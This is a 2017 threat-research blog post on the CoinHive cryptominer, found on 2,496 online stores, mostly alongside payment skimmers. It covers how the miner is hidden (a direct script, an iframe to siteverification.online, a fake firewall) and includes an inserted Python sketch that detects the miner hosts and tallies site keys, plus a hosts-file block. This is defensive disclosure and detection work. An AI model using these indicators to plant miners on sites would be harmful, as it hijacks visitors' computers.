Cryptojacking found on 2496 online stores
by Sansec Forensics Team
Published in Threat Research − November 07, 2017
Does your laptop get hot when visiting your favorite shop? Your computer is likely mining cryptocurrencies to the benefit of a cyberthief.
Cryptojacking - running crypto mining software in the browser of unsuspecting visitors - is quickly spreading around the web. And the landgrab extends to online stores. The infamous CoinHive software was detected today on 2496 e-commerce sites.
Skimming and cryptomining, a golden match
Now, it does not seem likely that the legitimate store owners wanted to earn a few extra bucks and have added CoinHive themselves. I found that 80% of cryptomining stores also contain payment skimming malware. Apparently, cyberthieves are squeezing every penny out of their confiscated assets.
Spread fuelled by just a few individuals
As CoinHive requires a unique ID, we can analyze the distribution of crypto thieves. Out of 2496 infected stores, 85% are linked to only 2 CoinHive accounts, while the remaining 15% are spread out over unique CoinHive accounts. Because the tag added to this remaining 15% segment is consistently the site's name, my guess is that this cryptojacking surge on online stores can be attributed to just 3 individuals or groups.
Well hidden
Some sites bluntly include the official coinhive.js file, others are more stealthy and include an iframe that points to siteverification.online. This site shows a default Debian installation page but includes a cryptominer nevertheless. Yet others disguise themselves as Sucuri Firewall.
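A minimal detection sketch for the indicators described above, added here as an example and not Sansec's scanner code: it flags script and iframe sources on the hosts named in this article and tallies stores per CoinHive site key. The sample pages, the key value, and the assumption that the key is the first string argument of a CoinHive.Anonymous or CoinHive.User call are constructed for illustration.

```python
import re
from collections import Counter

# Hosts named in the article; subdomains of these are matched as well.
MINER_HOSTS = ("coinhive.com", "coin-hive.com", "siteverification.online")

# src attribute of <script> and <iframe> tags
SRC_RE = re.compile(r'<(script|iframe)\b[^>]*?\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)
# Assumption: the site key is the first string argument of the miner constructor
KEY_RE = re.compile(r'CoinHive\.(?:Anonymous|User)\(\s*["\']([A-Za-z0-9]+)["\']', re.I)

def scan_page(html):
    """Return (indicators, site_keys) found in one page's HTML."""
    indicators = []
    for tag, src in SRC_RE.findall(html):
        # Strip scheme (or protocol-relative //), path and port to get the host
        host = re.sub(r'^(?:https?:)?//', '', src).split('/')[0].split(':')[0].lower()
        if any(host == h or host.endswith('.' + h) for h in MINER_HOSTS):
            indicators.append((tag.lower(), host))
    return indicators, sorted(set(KEY_RE.findall(html)))

def tally_accounts(pages):
    """Count how many stores reference each site key."""
    counts = Counter()
    for html in pages.values():
        counts.update(scan_page(html)[1])
    return counts

# Constructed sample pages (not real stores, not a real key)
SAMPLE_PAGES = {
    "shop-a.example": '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
                      '<script>new CoinHive.Anonymous("KEYAAAA1111").start();</script>',
    # Iframe variant: the key lives in the framed page, so none is visible here
    "shop-b.example": '<iframe src="//siteverification.online/" width="0" height="0"></iframe>',
    "shop-c.example": '<script src="https://coin-hive.com/lib/coinhive.min.js"></script>'
                      '<script>var m = new CoinHive.User("KEYAAAA1111", "shop-c.example");</script>',
    "shop-d.example": '<script src="/js/app.js"></script>',  # clean page
}

if __name__ == "__main__":
    for store, html in SAMPLE_PAGES.items():
        print(store, scan_page(html))
    print(tally_accounts(SAMPLE_PAGES))
```
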
Fix for your browser
Use an adblocker, install a Chrome plugin, or add 127.0.0.1 coin-hive.com coinhive.com to your hosts file.
We have added detection signatures to our eCommerce security scanner.